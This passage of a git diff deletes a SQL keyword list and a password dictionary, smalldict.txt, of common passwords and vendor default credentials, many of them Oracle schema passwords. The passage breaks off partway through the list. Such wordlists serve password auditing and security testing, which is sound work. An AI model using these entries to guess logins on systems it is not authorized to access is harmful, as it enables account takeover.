-IF -IFNULL -IGNORE -ININDEX -INFILE -INNER -INOUT -INSENSITIVE -INSERT -INTINT1 -INT2 -INT3 -INT4 -INT8 -INTEGER -INTERVALINTO -IS -ISNULL -ITERATE -JOIN -KEY -KEYS -KILLLEADING -LEAVE -LEFT -LIKE -LIMIT -LINESLOAD -LOCALTIME -LOCALTIMESTAMP -LOCK -LONG -LONGBLOBLONGTEXT -LOOP -LOW_PRIORITY -MATCH -MEDIUMBLOB -MEDIUMINT -MEDIUMTEXTMIDDLEINT -MINUTE_MICROSECOND -MINUTE_SECOND -MOD -MODIFIES -NATURAL -NOTNO_WRITE_TO_BINLOG -NULL -NUMERIC -ON 
-OPTIMIZE -OPTION -OPTIONALLYOR -ORDER -OUT -OUTER -OUTFILE -PRECISIONPRIMARY -PROCEDURE -PURGE -READ -READS -REALREFERENCES -REGEXP -RELEASE -RENAME -REPEAT -REPLACE -REQUIRERESTRICT -RETURN -REVOKE -RIGHT -RLIKE -SCHEMA -SCHEMASSECOND_MICROSECOND -SELECT -SENSITIVE -SEPARATOR -SET -SHOW -SMALLINTSONAME -SPATIAL -SPECIFIC -SQL -SQLEXCEPTION -SQLSTATESQLWARNING -SQL_BIG_RESULT -SQL_CALC_FOUND_ROWS -SQL_SMALL_RESULT -SSL -STARTINGSTRAIGHT_JOIN -TABLE -TERMINATED -THEN -TINYBLOB -TINYINT -TINYTEXTTO -TRAILING -TRIGGER -TRUE -UNDO -UNION -UNIQUEUNLOCK -UNSIGNED -UPDATE -USAGE -USE -USING -UTC_DATEUTC_TIME -UTC_TIMESTAMP -VALUES -VARBINARY -VARCHAR -VARCHARACTERVARYING -VERSION -WHEN -WHERE -WHILE -WITH -WRITEXOR -YEAR_MONTH -ZEROFILL diff --git a/txt/smalldict.txt b/txt/smalldict.txt deleted file mode 100644 index 766f506280c..00000000000 --- a/txt/smalldict.txt +++ /dev/null @@ -1,3567 +0,0 @@ -!@#$%^&* -!@#$%^& -!@#$%^ -!@#$% -@#$%^& -* -000000 -00000000 -0007 -007 -007007 -06071992 -0racl3 -0racl38 -0racl38i -0racl39 -0racl39i -0racle -0racle8 -0racle8i -0racle9 -0racle9i -1 -1022 -10sne1 -1111 -11111 -111111 -11111111 -1212 -121212 -1213 -1214 -1225 -123 -123123 -123321 -1234 -12345 -123456 -1234567 -12345678 -1234qwer -123abc -123go -1313 -131313 -1316 -1332 -13579 -1412 -1430 -1701d -171717 -1818 -181818 -1911 -1928 -1948 -1950 -1952 -1953 -1955 -1956 -1960 -1964 -1969 -1973 -1975 -1977 -1978 -1991 -199220706 -1996 -1a2b3c -1chris -1kitty -1p2o3i -1q2w3e -1qw23e -2000 -2001 -2020 -2112 -21122112 -22 -2200 -2222 -2252 -2kids -3010 -3112 -3141 -333 -3533 -369 -3bears -4055 -4444 -4788 -4854 -4runner -5050 -5121 -5252 -54321 -5555 -55555 -5683 -57chevy -6262 -6301 -654321 -666666 -6969 -696969 -777 -7777 -7777777 -789456 -7dwarfs -80486 -8675309 -888888 -88888888 -90210 -911 -99999999 -a -a12345 -a1b2c3 -a1b2c3d4 -aa -aaa -aaaa -aaaaaa -aardvark -aaron -abacab -abbott -abby -abc -abc123 -ABC123 -abcd -abcd123 -abcd1234 -abcde -abcdef -Abcdef -abcdefg -Abcdefg -abigail -abm -absolut -access -accord -account -ace -acropolis -action -active -acura -adam -adg -adgangskode -adi -adidas -adldemo -admin -admin1 -administrator -adrian -adrock -advil -aerobics -africa -agent -ahl -ahm -airborne -airoplane -airwolf -ak -akf7d98s2 -aki123 -alaska -albert -alex -alex1 -alexander -alexandr -alexis -Alexis -alfaro -alfred -ali -alice -alice1 -alicia -alien -aliens -alina -aline -alison -allegro -allen -allison -allo -allstate -aloha -alpha -Alpha -alpha1 -alpine -alr -altamira -althea -altima -altima1 -amanda -amanda1 -amazing -amber -amelie -america -amour -ams -amv -amy -anaconda -anders -anderson -andre -andre1 -andrea -andrea1 -andrew! 
-andrew -Andrew -andrew1 -andromed -andy -angel -angel1 -angela -angels -angie -angie1 -angus -animal -Animals -anita -ann -anna -anne -anneli -annette -annie -anonymous -antares -anthony -Anthony -anything -ap -apache -apollo -apollo13 -apple -apple1 -apple2 -applepie -apples -applmgr -applsys -applsyspub -apppassword -apps -april -aptiva -aq -aqdemo -aqjava -aqua -aquarius -aquser -ar -aragorn -archie -ariane -ariel -Ariel -arizona -arlene -arnold -arrow -arsenal -artemis -arthur -artist -asdf -asdf1234 -asdfasdf -asdfg -asdfgh -Asdfgh -asdfghjk -asdfjkl; -asdfjkl -asdf;lkj -asf -asg -ashley -ashley1 -ashraf -ashton -asl -aso -asp -aspen -ass -asshole -assmunch -ast -asterix -ath -athena -attila -audiouser -august -austin -autumn -avalon -avatar -avenger -avenir -awesome -ax -ayelet -aylmer -az -babes -baby -babydoll -babylon5 -bach -backup -badger -bailey -Bailey -bambi -bamboo -banana -bandit -bar -baraka -barbara -barbie -barn -barney -barney1 -barnyard -barrett -barry -bart -bartman -baseball -basf -basil -basket -basketball -bass -Bastard -batman -batman1 -bball -bc4j -beaches -beagle -beaner -beanie -beans -bear -bears -beast -beasty -beatles -beatrice -beautiful -beauty -beaver -beavis -Beavis -beavis1 -bebe -becca -beer -belgium -belize -bella -belle -belmont -ben -benjamin -benji -benny -benoit -benson -beowulf -bernard -bernardo -bernie -berry -bertha -beryl -best -beta -betacam -betsy -betty -bharat -bic -bichon -bigal -bigben -bigbird -bigboss -bigdog -biggles -bigmac -bigman -bigred -biker -bil -bilbo -bill -bills -billy -billy1 -bim -bimmer -bingo -binky -bioboy -biochem -biology -bird -bird33 -birdie -birdy -birthday -bis -biscuit -bishop -Bismillah -bitch -biteme -bitter -biv -bix -biz -black -blackjack -blah -blanche -blazer -blewis -blinds -bliss -blitz -blizzard -blonde -blondie -blood -blowfish -blowjob -blowme -blue -bluebird -blueeyes -bluefish -bluejean -blues -bluesky -bmw -boat -bob -bobby -bobcat -bogart -bogey -bogus -bom -bombay -bond007 -Bond007 -bonjour -bonnie -Bonzo -boobie -booboo -Booboo -booger -boogie -boomer -booster -boots -bootsie -boris -bosco -boss -BOSS -boston -Boston -boulder -bourbon -boxer -boxers -bozo -bradley -brain -branch -brandi -brandon -brandy -braves -brazil -brenda -brent -brewster -brian -bridge -bridges -bright -brio_admin -britain -Broadway -broker -bronco -bronte -brooke -brother -bruce -bruno -brutus -bryan -bsc -bubba -bubba1 -bubble -bubbles -buck -bucks -buddha -buddy -budgie -buffalo -buffett -buffy -bug_reports -bugs -bugsy -bull -bulldog -bullet -bulls -bullshit -bunny -burns -burton -business -buster -butch -butler -butter -butterfly -butthead -button -buttons -buzz -byron -byteme -c00per -cactus -caesar -caitlin -calendar -calgary -california -calvin -calvin1 -camaro -camay -camel -camera -camille -campbell -camping -canada -cancer -candy -canela -cannon -cannondale -canon -Canucks -captain -car -carbon -cardinal -Cardinal -carebear -carl -carlos -carmen -carnage -carol -Carol -carol1 -carole -carolina -caroline -carolyn -carrie -carrot -cascade -casey -Casio -casper -cassie -castle -cat -catalina -catalog -catch22 -catfish -catherine -cathy -catnip -cats -catwoman -cccccc -cct -cdemo82 -cdemo83 -cdemocor -cdemorid -cdemoucb -cdouglas -ce -cecile -cedic -celica -celine -Celtics -cement -center -centra -central -cesar -cessna -chad -chainsaw -challenge -chameleon -champion -Champs -chance -chandler -chanel -chang -change -changeit -changeme -Changeme -ChangeMe -change_on_install -chantal -chaos -chapman -charger -charity 
-charles -charlie -Charlie -charlie1 -charlotte -chat -cheese -chelsea -chelsea1 -cherry -cheryl -chess -chester1 -chevy -chiara -chicago -chicken -chico -chiefs -china -chinacat -chinook -chip -chiquita -chloe -chocolat -chocolate -chouette -chris -Chris -chris1 -chris123 -christ1 -christia -christian -christin -christmas -christoph -christopher -christy -chronos -chuck -church -cicero -cids -cinder -cindy -cindy1 -cinema -circuit -cirque -cirrus -cis -cisinfo -civic -civil -claire -clancy -clapton -clark -clarkson -class -classroom -claude -claudel -claudia -clave -cleo -clerk -cliff -clipper -clock -cloclo -cloth -clueless -cn -cobain -cobra -cocacola -coco -cody -coffee -coke -colette -colleen -college -color -colorado -colors -colt45 -coltrane -columbia -comet -commander -company -compaq -compiere -compton -computer -Computer -concept -concorde -confused -connect -connie -conrad -content -control -cook -cookie -cookies -cooking -cool -coolbean -cooper -cooter -copper -cora -cordelia -corky -cornflake -corona -corrado -corvette -corwin -cosmo -cosmos -cougar -Cougar -cougars -country -courier -courtney -cowboy -cowboys -cows -coyote -crack1 -cracker -craig -crawford -creative -Creative -crescent -cricket -cross -crow -crowley -crp -cruise -crusader -crystal -cs -csc -csd -cse -csf -csi -csl -csmig -csp -csr -css -cthulhu -ctxdemo -ctxsys -cua -cuda -cuddles -cue -cuervo -cuf -cug -cui -cun -cunningham -cunt -cup -cupcake -current -curtis -Curtis -cus -cutie -cutlass -cyber -cyclone -cynthia -cyrano -cz -daddy -daedalus -dagger -dagger1 -daily -daisie -daisy -dakota -dale -dallas -dammit -damogran -dan -dana -dance -dancer -daniel -Daniel -daniel1 -danielle -danny -daphne -dark1 -Darkman -darkstar -darren -darryl -darwin -dasha -data1 -database -datatrain -dave -david -david1 -davids -dawn -daytek -dbsnmp -dbvision -dead -deadhead -dean -death -debbie -deborah -december -decker -deedee -deeznuts -def -delano -delete -deliver -delta -demo -demo8 -demo9 -demon -denali -denis -denise -Denise -dennis -denny -depeche -derek -des -des2k -desert -design -deskjet -destiny -detroit -deutsch -dev2000_demos -devil -devine -devon -dexter -dharma -diablo -diamond -diana -diane -dianne -dickens -dickhead -diesel -digger -digital -dilbert -dillweed -dim -dip -dipper -director -dirk -disco -discoverer_admin -disney -dixie -dixon -dmsys -doc -doctor -dodger -dodgers -dog -dogbert -doggy -doitnow -dollar -dollars -dolly -dolphin -dolphins -dominic -dominique -domino -don -donald -donkey -donna -dontknow -doogie -dookie -doom -doom2 -doors -dork -dorothy -doudou -doug -dougie -douglas -downtown -dpfpass -draft -dragon -Dragon -dragon1 -dragonfly -dreamer -dreams -driver -dsgateway -dssys -d_syspw -d_systpw -dtsp -duck -duckie -dude -dudley -duke -dumbass -dundee -dusty -dutch -dutchess -dwight -dylan -e -eaa -eagle -eagle1 -eagles -Eagles -eam -east -easter -eastern -ec -eclipse -ecx -eddie -edith -edmund -edward -eeyore -effie -eieio -eight -einstein -ejb -ejsadmin -ejsadmin_password -electric -element -elephant -elina1 -elissa -elizabeth -Elizabeth -ella -ellen -elliot -elsie -elvis -e-mail -emerald -emily -emmitt -emp -empire -energy -eng -engage -eni -enigma -enter -enterprise -entropy -eric -eric1 -erin -ernie1 -escort -escort1 -estelle -Esther -estore -etoile -eugene -europe -evelyn -event -evm -example -excalibur -excel -exfsys -explore -explorer -export -express -extdemo -extdemo2 -eyal -fa -faculty -fairview -faith -falcon -family -Family -family1 -farmer -farout -farside -fatboy -faust -fearless 
-feedback -felipe -felix -fem -fender -fenris -ferguson -ferrari -ferret -ferris -fiction -fidel -Figaro -fii -finance -finprod -fiona -fire -fireball -firebird -fireman -firenze -first -fish -fish1 -fisher -Fisher -fishes -fishhead -fishie -fishing -Fishing -flamingo -flanders -flash -fletch -fletcher -fleurs -flight -flip -flipper -flm -florida -florida1 -flower -flowerpot -flowers -floyd -fluffy -flute -fly -flyboy -flyer -fnd -fndpub -foobar -fool -football -ford -forest -Fortune -forward -foster -fountain -fox -foxtrot -fozzie -fpt -france -francesco -francine -francis -francois -frank -franka -franklin -freak1 -fred -freddie -freddy -Freddy -frederic -free -freebird -freedom -freeman -french -french1 -friday -Friday -friend -friends -Friends -frisco -fritz -frm -frodo -frog -froggie -froggies -froggy -frogs -front242 -Front242 -frontier -fte -fubar -fucker -fuckface -fuckme -fuckoff -fucku -fuckyou -Fuckyou -FuckYou -fugazi -fun -funguy -funtime -future -fuzz -fv -gabby -gabriel -gabriell -gaby -gaelic -galaxy -galileo -gambit -gambler -games -gammaphi -gandalf -Gandalf -garcia -garden -garfield -garfunkel -gargoyle -garlic -garnet -garth -gary -gasman -gaston -gateway -gateway2 -gator -gator1 -gemini -general -genesis -genius -george -george1 -georgia -gerald -german -germany -germany1 -Geronimo -getout -ggeorge -ghost -giants -gibbons -gibson -gigi -gilbert -gilgamesh -gilles -ginger -Gingers -giselle -gizmo -Gizmo -gl -glenn -glider1 -global -gma -gmd -gme -gmf -gmi -gml -gmoney -gmp -gms -go -goat -goaway -goblin -goblue -gocougs -godiva -godzilla -goethe -gofish -goforit -gold -golden -Golden -goldfish -golf -golfer -gollum -gone -goober -Goober -good -good-luck -goodluck -goofy -goose -gopher -gordon -gpfd -gpld -gr -grace -graham -gramps -grandma -grant -graphic -grateful -gravis -gray -graymail -greed -green -greenday -greg -greg1 -gregory -gremlin -greta -gretchen -Gretel -gretzky -grizzly -groovy -grover -grumpy -guess -guest -guido -guinness -guitar -guitar1 -gumby -gunner -gustavo -h2opolo -hacker -Hacker -hades -haggis -haha -hailey -hal -hal9000 -halloween -hallowell -hamid -hamilton -hamlet -hammer -Hammer -hank -hanna -hannah -hansolo -hanson -happy -happy1 -happy123 -happyday -hardcore -harley -Harley -HARLEY -harley1 -haro -harold -harriet -harris -harrison -harry -harvard -harvey -hawk -hawkeye -hawkeye1 -hazel -hcpark -health -health1 -heart -heather -Heather -heather1 -heather2 -heaven -hector -hedgehog -heidi -heikki -helen -helena -helene -hell -hello -Hello -hello1 -hello123 -hello8 -hellohello -help -help123 -helper -helpme -hendrix -Hendrix -henry -Henry -herbert -herman -hermes -Hershey -herzog -heythere -highland -hilbert -hilda -hillary -histoire -history -hithere -hitler -hlw -hobbes -hobbit -hockey -hola -holiday -holly -home -homebrew -homer -Homer -homerj -honda -honda1 -honey -hongkong -hoops -hoosier -hootie -hope -horizon -hornet -horse -horses -hosehead -hotdog -hotrod -house -houston -howard -hr -hri -huang -hudson -huey -hugh -hugo -hummer -hunter -huskies -hvst -hxc -hxt -hydrogen -i -ib6ub9 -iba -ibanez -ibe -ibp -ibu -iby -icdbown -icecream -iceman -icx -idemo_user -idiot -idontknow -ieb -iec -iem -ieo -ies -ieu -iex -if6was9 -iforget -ifssys -igc -igf -igi -igs -iguana -igw -ilmari -iloveu -iloveyou -image -imageuser -imagine -imc -imedia -impact -impala -imt -indian -indiana -indigo -indonesia -info -informix -ingvar -insane -inside -insight -instance -instruct -integra -integral -intern -internet -Internet -intrepid -inv -invalid -invalid 
password -iomega -ipa -ipd -iplanet -ireland -irene -irina -iris -irish -irmeli -ironman -isaac -isabel -isabelle -isc -island -israel -italia -italy -itg -izzy -j0ker -j1l2t3 -ja -jack -jackie -jackie1 -jackson -Jackson -jacob -jaguar -jake -jakey -jamaica -james -james1 -jamesbond -jamie -jamjam -jan -jane -Janet -janice -japan -jared -jasmin -jasmine -jason -jason1 -jasper -jazz -je -jean -jeanette -jeanne -Jeanne -jedi -jeepster -jeff -jeffrey -jeffrey1 -jenifer -jenni -jennie -jennifer -Jennifer -jenny -jenny1 -jensen -jer -jeremy -jerry -Jersey -jesse -jesse1 -jessica -Jessica -jessie -jester -jesus -jesus1 -jethro -jethrotull -jetspeed -jetta1 -jewels -jg -jim -jimbo -jimbob -jimi -jimmy -jkl123 -jkm -jl -jmuser -joanie -joanna -Joanna -joe -joel -joelle -joey -johan -johanna1 -john -john316 -johnny -johnson -Johnson -jojo -joker -joker1 -jonathan -jordan -Jordan -jordan23 -jordie -jorge -josee -joseph -josh -joshua -Joshua -josie -journey -joy -joyce -JSBach -jtf -jtm -jts -jubilee -judith -judy -juhani -jules -julia -julia2 -julian -julie -julie1 -julien -juliet -jumanji -jumbo -jump -junebug -junior -juniper -jupiter -jussi -justdoit -justice -justice4 -justin -justin1 -kalamazo -kali -kangaroo -karen -karen1 -karin -karine -karma -kat -kate -katerina -katherine -kathleen -kathy -katie -Katie -katie1 -kayla -kcin -keeper -keepout -keith -keith1 -keller -kelly -kelly1 -kelsey -kendall -kennedy -kenneth -kenny -kerala -kermit -kerrya -ketchup -kevin -kevin1 -khan -kidder -kids -killer -Killer -KILLER -kim -kimberly -king -kingdom -kingfish -kings -kirk -kissa2 -kissme -kitkat -kitten -Kitten -kitty -kittycat -kiwi -kkkkkk -kleenex -knicks -knight -Knight -koala -koko -kombat -kramer -kris -kristen -kristi -kristin -kristine -kwalker -l2ldemo -lab1 -labtec -lacrosse -laddie -lady -ladybug -lakers -lambda -lamer -lance -larry -larry1 -laser -laserjet -laskjdf098ksdaf09 -lassie1 -laura -laurel -lauren -laurie -law -lawrence -lawson -lawyer -lbacsys -leader -leaf -leblanc -ledzep -lee -legal -legend -leland -lemon -leo -leon -leonard -leslie -lestat -lester -letmein -letter -letters -lev -lexus1 -liberty -Liberty -libra -library -life -light -lights -lima -lincoln -linda -lindsay -Lindsay -lindsey -lionel -lionking -lions -lisa -lissabon -little -liverpool -liz -lizard -Lizard -lizzy -lloyd -logan -logger -logical -logos -loislane -loki -lola -lolita -london -lonely -lonestar -longer -longhorn -looney -loren -lori -lorna -lorraine -lorrie -loser -lost -lotus -lou -louis -louise -love -lovely -loveme -lovers -loveyou -lucas -lucia -lucifer -lucky -lucky1 -lucky14 -lucy -lulu -lynn -m -m1911a1 -mac -macha -macintosh -macross -macse30 -maddie -maddog -Madeline -madison -madmax -madoka -madonna -maggie -magic -magic1 -magnum -maiden -mail -mailer -mailman -maine -major -majordomo -makeitso -malcolm -malibu -mallard -manag3r -manageme -manager -manprod -manson -mantra -manuel -marathon -marc -marcel -marcus -margaret -Margaret -maria -maria1 -mariah -mariah1 -marie -marielle -marilyn -marina -marine -mariner -marino -mario -mariposa -mark -mark1 -market -marlboro -marley -mars -marshall -mart -martha -martin -martin1 -marty -marvin -mary -maryjane -master -Master -master1 -math -matrix -matt -matthew -Matthew -matti1 -mattingly -maurice -maverick -max -maxime -maxine -maxmax -maxwell -Maxwell -mayday -mazda1 -mddata -mddemo -mddemo_mgr -mdsys -me -meatloaf -mech -mechanic -media -medical -megan -meggie -meister -melanie -melina -melissa -Mellon -melody -memory -memphis -mensuck -meow 
-mercedes -mercer -mercury -merde -merlin -merlot -Merlot -mermaid -merrill -metal -metallic -Metallic -mexico -mfg -mgr -mgwuser -miami -michael -Michael -michael1 -michal -michel -Michel -Michel1 -michele -michelle -Michelle -michigan -michou -mickel -mickey -mickey1 -micro -microsoft -midnight -midori -midvale -midway -migrate -mikael -mike -mike1 -mikey -miki -milano -miles -millenium -miller -millie -million -mimi -mindy -mine -minnie -minou -miracle -mirage -miranda -miriam -mirror -misha -mishka -mission -missy -misty -mitch -mitchell -mmm -mmmmmm -mmo2 -mmo3 -mmouse -mobile -mobydick -modem -mojo -molly -molly1 -molson -mom -monday -Monday -monet -money -Money -money1 -monica -monique -monkey -monkey1 -monopoly -monroe -Monster -montana -montana3 -montreal -Montreal -montrose -monty -moocow -mookie -moomoo -moon -moonbeam -moore -moose -mopar -moreau -morecats -morgan -moroni -morpheus -morris -mort -mortimer -mot_de_passe -mother -motor -motorola -mountain -mouse -mouse1 -movies -mowgli -mozart -mrp -msc -msd -mso -msr -mt6ch5 -mtrpw -mts_password -mtssys -muffin -mulder -mulder1 -mumblefratz -munchkin -murphy -murray -muscle -music -mustang -mustang1 -mwa -mxagent -nadia -nadine -names -nancy -naomi -napoleon -nascar -nat -natasha -nathan -nation -national -nautica -ncc1701 -NCC1701 -ncc1701d -ncc1701e -ne1410s -ne1469 -ne14a69 -nebraska -neil -neko -nellie -nelson -nemesis -neotix_sys -nermal -nesbit -nesbitt -nestle -netware -network -neutrino -new -newaccount -newcourt -newlife -newpass -news -newton -Newton -newuser -newyork -newyork1 -nexus6 -nguyen -nicarao -nicholas -Nicholas -nichole -nick -nicklaus -nicole -nigel -nightshadow -nightwind -nike -niki -nikita -nikki -nimrod -nina -niners -nintendo -nirvana -nirvana1 -nissan -nisse -nite -nneulpass -nokia -nomore -none -none1 -nopass -Noriko -normal -norman -norton -notebook -nothing -notta1 -notused -nouveau -novell -noway -nugget -number9 -numbers -nurse -nutmeg -oas_public -oatmeal -oaxaca -obiwan -obsession -ocean -ocitest -ocm_db_admin -october -October -odm -ods -odscommon -ods_server -oe -oemadm -oemrep -oem_temp -ohshit -oicu812 -okb -okc -oke -oki -oko -okr -oks -okx -olapdba -olapsvr -olapsys -olive -oliver -olivia -olivier -ollie -olsen -omega -one -online -ont -oo -open -openspirit -openup -opera -opi -opus -oracache -oracl3 -oracle -oracle8 -oracle8i -oracle9 -oracle9i -oradbapass -orange -oranges -oraprobe -oraregsys -orasso -orasso_ds -orasso_pa -orasso_ps -orasso_public -orastat -orchid -ordcommon -ordplugins -ordsys -oregon -oreo -orion -orlando -orville -oscar -osm -osp22 -ota -otter -ou812 -OU812 -outln -overkill -owa -owa_public -owf_mgr -owner -oxford -ozf -ozp -ozs -ozzy -pa -paagal -pacers -pacific -packard -packer -packers -packrat -paint -painter -Paladin -paloma -pam -pamela -Pamela -panama -pancake -panda -pandora -panic -pantera -panther -papa -paper -paradigm -paris -park -parker -parol -parola -parrot -partner -pascal -pass -passion -passwd -passwo1 -passwo2 -passwo3 -passwo4 -password -Password -pat -patches -patricia -patrick -patriots -patrol -patton -paul -paula -pauline -pavel -payton -peace -peach -peaches -Peaches -peanut -peanuts -Peanuts -pearl -pearljam -pedro -pedro1 -peewee -peggy -pekka -pencil -penelope -penguin -penny -pentium -Pentium -people -pepper -Pepper -pepsi -percy -perfect -performa -perfstat -perry -person -perstat -pete -peter -Peter -peter1 -peterk -peterpan -petey -petunia -phantom -phialpha -phil -philip -philips -phillips -phish -phishy -phoenix -Phoenix -phoenix1 
-phone -photo -piano -piano1 -pianoman -pianos -picard -picasso -pickle -picture -pierce -pierre -pigeon -piglet -Piglet -pink -pinkfloyd -pioneer -pipeline -piper1 -pirate -pisces -pit -pizza -pjm -planet -planning -plato -play -playboy -player -players -please -plex -plus -pluto -pm -pmi -pn -po -po7 -po8 -poa -poetic -poetry -poiuyt -polar -polaris -pole -police -politics -polo -pom -pomme -pontiac -poohbear -pookey -pookie -Pookie -pookie1 -popcorn -pope -popeye -poppy -porsche -porsche911 -portal30 -portal30_admin -portal30_demo -portal30_ps -portal30_public -portal30_sso -portal30_sso_admin -portal30_sso_ps -portal30_sso_public -portal31 -portal_demo -portal_sso_ps -porter -portland -pos -power -powercartuser -ppp -PPP -praise -prayer -precious -predator -prelude -premier -preston -primary -primus -prince -princess -Princess -print -printing -prof -prometheus -property -protel -provider -psa -psalms -psb -psp -psycho -pub -public -pubsub -pubsub1 -puddin -pulsar -pumpkin -punkin -puppy -purple -Purple -pussy -pussy1 -pv -pyramid -pyro -python -q1w2e3 -qa -qdba -qp -qqq111 -qs -qs_adm -qs_cb -qs_cbadm -qs_cs -qs_es -qs_os -qs_ws -quality -quebec -queen -queenie -quentin -quest -qwaszx -qwer -qwert -Qwert -qwerty -Qwerty -qwerty12 -qwertyui -r0ger -rabbit -Rabbit -rabbit1 -racer -racerx -rachel -rachelle -racoon -radar -radio -rafiki -raiders -Raiders -rain -rainbow -Raistlin -raleigh -ralph -ram -rambo -rambo1 -rancid -random -Random -randy -randy1 -ranger -rangers -raptor -raquel -rascal -rasta1 -rastafarian -ratio -raven -ravens -raymond -re -reality -rebecca -Rebecca -red -redcloud -reddog -redfish -redman -redrum -redskins -redwing -redwood -reed -reggae -reggie -reliant -remember -remote -rene -renee -renegade -repadmin -reports -rep_owner -reptile -republic -rescue -research -revolution -rex -reynolds -reznor -rg -rhino -rhjrjlbk -rhonda -rhx -ricardo -ricardo1 -richard -richard1 -richards -richmond -ricky -riley -ripper -ripple -rita -river -rla -rlm -rmail -rman -roadrunner -rob -robbie -robby -robert -Robert -robert1 -roberts -robin -robinhood -robocop -robotech -robotics -roche -rock -rocket -rocket1 -rockie -rocknroll -rockon -rocky -rocky1 -rodeo -roger -roger1 -rogers -roland -rolex -roman -rommel -ronald -roni -rookie -rootbeer -rose -rosebud -roses -rosie -rossigno -rouge -route66 -roxy -roy -royal -rrs -ruby -rufus -rugby -rugger -runner -running -rush -russell -Russell -rusty -ruth -ruthie -ruthless -ryan -sabbath -sabina -sabrina -sadie -safety -safety1 -saigon -sailing -sailor -saint -sakura -salasana -sales -sally -salmon -salut -sam -samantha -samiam -samIam -sammie -sammy -Sammy -sample -sampleatm -sampson -samsam -samson -samuel -sandi -sandra -sandy -sanjose -santa -sap -saphire -sapphire -sapr3 -sarah -sarah1 -sasha -saskia -sassy -satori -saturday -saturn -Saturn -saturn5 -savage -sbdc -scarecrow -scarlet -scarlett -schnapps -school -science -scooby -scoobydoo -scooter -scooter1 -scorpio -scorpion -scotch -scott -scott1 -scottie -scotty -scout -scouts -scrooge -scruffy -scuba -scuba1 -sdos_icsap -sean -search -seattle -secdemo -secret -secret3 -security -seeker -senha -seoul -september -serena -sergei -sergey -server -service -Service -serviceconsumer1 -services -seven -seven7 -sex -sexy -sh -shadow -Shadow -shadow1 -shaggy -shalom -shanghai -shannon -shanny -shanti -shaolin -shark -sharon -shasta -shawn -shayne -shazam -sheba -sheena -sheila -shelby -shelley -shelly -shelter -shelves -sherry -ship -shirley -shit -shithead -shoes -shogun -shorty -shotgun 
-Sidekick -sidney -sierra -Sierra -sigmachi -signal -signature -si_informtn_schema -silver -simba -simba1 -simon -simple -simsim -sinatra -singer -sirius -siteminder -skate -skeeter -Skeeter -skibum -skidoo -skiing -skip -skipper -skipper1 -skippy -skull -skunk -skydive -skyler -skywalker -slacker -slayer -sleepy -slick -slidepw -slider -slip -smashing -smegma -smile -smile1 -smiles -smiley -smiths -smitty -smoke -smokey -Smokey -smurfy -snake -snakes -snapper -snapple -snickers -sniper -snoop -snoopdog -snoopy -Snoopy -snow -snowball -snowflake -snowman -snowski -snuffy -sober1 -soccer -soccer1 -softball -soleil -solomon -sonic -sonics -sonny -sony -sophia -sophie -sound -space -spain -spanky -sparks -sparky -Sparky -sparrow -spartan -spazz -special -speedo -speedy -Speedy -spencer -sphynx -spider -spierson -spike -spike1 -spitfire -spock -sponge -spooky -spoon -sports -spot -spring -sprite -sprocket -spunky -spurs -squash -ssp -sss -ssssss -stacey -stan -stanley -star -star69 -starbuck -stargate -starlight -stars -start -starter -startrek -starwars -station -stealth -steel -steele -steelers -stella -steph -steph1 -stephani -stephanie -stephen -stephi -Sterling -steve -steve1 -steven -Steven -steven1 -stevens -stewart -stimpy -sting -sting1 -stingray -stinky -stivers -stocks -stone -storage -storm -stormy -stranger -strat -strato -strat_passwd -strawberry -stretch -strong -stuart -stud -student -student2 -studio -stumpy -stupid -success -sucker -suckme -sue -sugar -sultan -summer -Summer -summit -sumuinen -sun -sunbird -sundance -sunday -sunfire -sunflower -sunny -sunny1 -sunrise -sunset -sunshine -Sunshine -super -superfly -superman -Superman -supersecret -superstar -support -supra -surf -surfer -surfing -susan -susan1 -susanna -sutton -suzanne -suzuki -suzy -Sverige -swanson -sweden -sweetie -sweetpea -sweety -swim -swimmer -swimming -switzer -Swoosh -swordfish -swpro -swuser -sydney -sylvia -sylvie -symbol -sympa -sys -sysadm -sysadmin -sysman -syspass -sys_stnt -system -system5 -systempass -tab -tabatha -tacobell -taffy -tahiti -taiwan -talon -tamara -tammy -tamtam -tango -tanner -tanya -tapani -tara -targas -target -tarheel -tarzan -tasha -tata -tattoo -taurus -Taurus -taylor -Taylor -tazdevil -tbird -t-bone -tdos_icsap -teacher -tech -techno -tectec -teddy -teddy1 -teddybear -teflon -telecom -temp -temporal -tennis -Tennis -tequila -teresa -terminal -terry -terry1 -test -test1 -test123 -test2 -test3 -tester -testi -testing -testpass -testpilot -testtest -test_user -texas -thankyou -the -theatre -theboss -theend -thejudge -theking -thelorax -theresa -Theresa -thinsamplepw -thisisit -thomas -Thomas -thompson -thorne -thrasher -thumper -thunder -Thunder -thunderbird -thursday -thx1138 -tibco -tiffany -tiger -tiger2 -tigers -tigger -Tigger -tightend -tigre -tika -tim -timber -time -timothy -tina -tinker -tinkerbell -tintin -tip37 -tnt -toby -today -tokyo -tom -tomcat -tommy -tony -tool -tootsie -topcat -topgun -topher -tornado -toronto -toshiba -total -toto1 -tototo -toucan -toyota -trace -tracy -training -transfer -transit -transport -trapper -trash -travel -travis -tre -treasure -trebor -tree -trees -trek -trevor -tricia -tricky -trident -trish -tristan -triton -trixie -trojan -trombone -trophy -trouble -trout -truck -trucker -truman -trumpet -trustno1 -tsdev -tsuser -tucker -tucson -tuesday -Tuesday -tula -turbine -turbo -turbo2 -turtle -tweety -twins -tyler -tyler1 -ultimate -um_admin -um_client -undead -unicorn -unique -united -unity -unix -unknown -upsilon -ursula -user -user0 
-user1 -user2 -user3 -user4 -user5 -user6 -user7 -user8 -user9 -utility -utlestat -utopia -vacation -vader -val -valentin -valentine -valerie -valhalla -valley -vampire -vanessa -vanilla -vea -vedder -veh -velo -velvet -venice -venus -vermont -Vernon -veronica -vertex_login -vette -vicki -vicky -victor -victor1 -victoria -Victoria -victory -video -videouser -vif_dev_pwd -viking -vikram -vincent -Vincent -vincent1 -violet -violin -viper -viper1 -virago -virgil -virginia -viruser -visa -vision -visual -volcano -volley -volvo -voodoo -vortex -voyager -vrr1 -vrr2 -waiting -walden -waldo -walker -walleye -wally -walter -wanker -warcraft -warlock -warner -warren -warrior -warriors -water -water1 -Waterloo -watson -wayne -wayne1 -weasel -webcal01 -webdb -webmaster -webread -webster -Webster -wedge -weezer -welcome -wendy -wendy1 -wesley -west -western -wfadmin -wh -whale1 -whatever -wheels -whisky -whit -white -whitney -whocares -whoville -wibble -wilbur -wildcat -will -william -william1 -williams -willie -willow -Willow -willy -wilma -wilson -win95 -wind -window -Windows -windsurf -winner -winnie -Winnie -winniethepooh -winona -winston -winter -wip -wisdom -wizard -wkadmin -wkproxy -wksys -wk_test -wkuser 